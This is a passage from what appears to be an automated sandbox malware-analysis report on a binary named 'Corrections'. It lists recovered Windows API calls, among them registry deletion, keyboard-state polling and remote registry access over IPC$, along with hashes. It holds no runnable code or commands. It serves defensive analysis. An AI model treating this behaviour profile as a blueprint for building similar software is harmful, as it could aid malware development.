                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                            • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                                            • Opcode ID: f351fe34393d4cc1073086af8dce813a137fff557bc268d3639db73b5ba4a62a
                                                                                                                                                                                                                                                                                            • Instruction ID: 48c814455927e9effd8ceeba0e0098fb8241be6b8a0a79a95051d55977b4072c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f351fe34393d4cc1073086af8dce813a137fff557bc268d3639db73b5ba4a62a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F412372A042147BEB00BBA49D87FFF77ACDFD5720F100129F900A6182FB759A0193A5
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 009AD6C4
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 009AD6ED
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 009AD7A8
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 009AD70A
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 009AD71D
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 009AD72F
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 009AD765
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 009AD788
                                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 009AD753
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                                            • Opcode ID: f5d8ca644f9a0ccd093401314a38101f26a69bf176b4eb85d35ec0a97768a774
                                                                                                                                                                                                                                                                                            • Instruction ID: d9d72283f572a62b9cd8697ba6351b372a74d1a3a5c5af909921092ae44cd35a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5d8ca644f9a0ccd093401314a38101f26a69bf176b4eb85d35ec0a97768a774
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E03184B5902129BBD7259B91DC88EFFBB7CEF46710F000165F806E3150EB349E459AE0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 0098EFCB
                                                                                                                                                                                                                                                                                              • Part of subcall function 0093F215: timeGetTime.WINMM(?,?,0098EFEB), ref: 0093F219
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 0098EFF8
                                                                                                                                                                                                                                                                                            • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0098F01C
                                                                                                                                                                                                                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0098F03E
                                                                                                                                                                                                                                                                                            • SetActiveWindow.USER32 ref: 0098F05D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0098F06B
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0098F08A
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000FA), ref: 0098F095
                                                                                                                                                                                                                                                                                            • IsWindow.USER32 ref: 0098F0A1
                                                                                                                                                                                                                                                                                            • EndDialog.USER32(00000000), ref: 0098F0B2
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                                            • String ID: BUTTON
                                                                                                                                                                                                                                                                                            • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                                            • Opcode ID: 42a75e82031a79423a8a9ceb9f215e192370cb8ff6abcd2b97c3a3bd29f572e5
                                                                                                                                                                                                                                                                                            • Instruction ID: fb9b3982f384907d4ae6d194d75d935874d954c48c41d93d7f85e22036c77637
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42a75e82031a79423a8a9ceb9f215e192370cb8ff6abcd2b97c3a3bd29f572e5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A219FB5129205BFE7117F60EC9AB367B69EB89B54B205025F501C2372DB798C00FB21
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0098F374
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0098F38A
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0098F39B
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0098F3AD
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0098F3BE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                            • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                                            • Opcode ID: 76264f0991e06ce938eb5476cb928b53f62dbd386c6f01814bd3431eaff6e0f0
                                                                                                                                                                                                                                                                                            • Instruction ID: 6bb11d17465ea8ee09581f4443d936df2f1462980d9841315cf52173b5aafa74
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76264f0991e06ce938eb5476cb928b53f62dbd386c6f01814bd3431eaff6e0f0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2110671A901A879D721B3A2DC5AFFFAB7CEFD1B40F40042A7401E20D1EAA01D04C7B1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0098A9D9
                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 0098AA44
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 0098AA64
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 0098AA7B
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 0098AAAA
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 0098AABB
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 0098AAE7
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 0098AAF5
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 0098AB1E
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 0098AB2C
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 0098AB55
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 0098AB63
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                            • Opcode ID: de4f91015fbb9b41b30a54e8f4e455f2e1c35062bc12247cea1f6262a086b816
                                                                                                                                                                                                                                                                                            • Instruction ID: 7d16cf9570133d6a9a35d86658dbe1d709eda54db9818428f1cbbadfa3829e58
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de4f91015fbb9b41b30a54e8f4e455f2e1c35062bc12247cea1f6262a086b816
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3851F960A0878429FB35F7A48950BEABFF99F12380F08459BD5C25B7C2DA549B4CC763
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00986649
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00986662
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 009866C0
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 009866D0
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 009866E2
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00986736
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00986744
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00986756
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00986798
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 009867AB
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009867C1
                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 009867CE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 276e8ce052b568ab325b4077a828e8f646efbaaff1bfc83b7b2504ed3da14c30
                                                                                                                                                                                                                                                                                            • Instruction ID: 7ee6c90c85c85391dda8b089e1819fc2769f1e24a5407d55385165c3e5da642b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 276e8ce052b568ab325b4077a828e8f646efbaaff1bfc83b7b2504ed3da14c30
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C75121B1B11205AFDF18DF68DD89AAE7BB9FB48315F108229F515E7290E7709D04CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00921802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00921488,?,00000000,?,?,?,?,0092145A,00000000,?), ref: 00921865
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00921521
                                                                                                                                                                                                                                                                                            • KillTimer.USER32(00000000,?,?,?,?,0092145A,00000000,?), ref: 009215BB
                                                                                                                                                                                                                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 009629B4
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0092145A,00000000,?), ref: 009629E2
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0092145A,00000000,?), ref: 009629F9
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0092145A,00000000), ref: 00962A15
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00962A27
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 641708696-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f3a40b9f91b28cd2c8ef39ca69b361a3d823d6de3a52f6392ff46c37728c5905
                                                                                                                                                                                                                                                                                            • Instruction ID: ced4ea168f5c5c6182ebcc3b037005b307c60bd29289634307e5cfcdd1a4c68b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f3a40b9f91b28cd2c8ef39ca69b361a3d823d6de3a52f6392ff46c37728c5905
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B761AC3051AB25DFCB359F14EA48B3977B5FF90322F208518E443876B4C7B4A9A0EB80
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00922234: GetWindowLongW.USER32(?,000000EB), ref: 00922242
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00922152
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 259745315-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d168c77b8f7960f13c2dad6cde2d660955f66506179c72be795956c83e4aa429
                                                                                                                                                                                                                                                                                            • Instruction ID: be0e9751c900365f41f9d14bcd3477b015a1617d59e5740e4384005267806814
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d168c77b8f7960f13c2dad6cde2d660955f66506179c72be795956c83e4aa429
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B441D231109664BFDB245F38EC49FB93769AB42330F144719FAA28B2E6D7319D52EB10
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00970D31,00000001,0000138C,00000001,00000000,00000001,?,0099EEAE,009F2430), ref: 0098A091
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00970D31,00000001), ref: 0098A09A
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00970D31,00000001,0000138C,00000001,00000000,00000001,?,0099EEAE,009F2430,?), ref: 0098A0BC
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00970D31,00000001), ref: 0098A0BF
                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0098A1E0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                            • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                                            • Opcode ID: 3eb2bf00e3a542abd8e037ee5f2dfcc277762d0bba09b35d268173cb05336a2d
                                                                                                                                                                                                                                                                                            • Instruction ID: 28fa82af207bfdb46735b2359a66014fb8783201eb99252148f383a763b9e38d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3eb2bf00e3a542abd8e037ee5f2dfcc277762d0bba09b35d268173cb05336a2d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35418372804219AADF05FBE0ED46FEEB778AF98340F500065F505B2196EB356F49CB61
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A
                                                                                                                                                                                                                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00981093
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009810AF
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009810CB
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 009810F5
                                                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0098111D
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00981128
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0098112D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                            • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                            • Opcode ID: 9b962f6a725f92603f312e927188680b8a3ccb7ea8c678b6b451100a9d195d83
                                                                                                                                                                                                                                                                                            • Instruction ID: 53a48cd070688692c94f034b375ca53fb57b76073fa3bb76c2fa7b54ed9aac7a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b962f6a725f92603f312e927188680b8a3ccb7ea8c678b6b451100a9d195d83
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30410872C14229ABCF11EFA4EC85DEEB7B8BF54750F004169F905A32A5EB319E05CB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009B4AD9
                                                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 009B4AE0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009B4AF3
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 009B4AFB
                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 009B4B06
                                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 009B4B10
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 009B4B1A
                                                                                                                                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 009B4B30
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 009B4B3C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
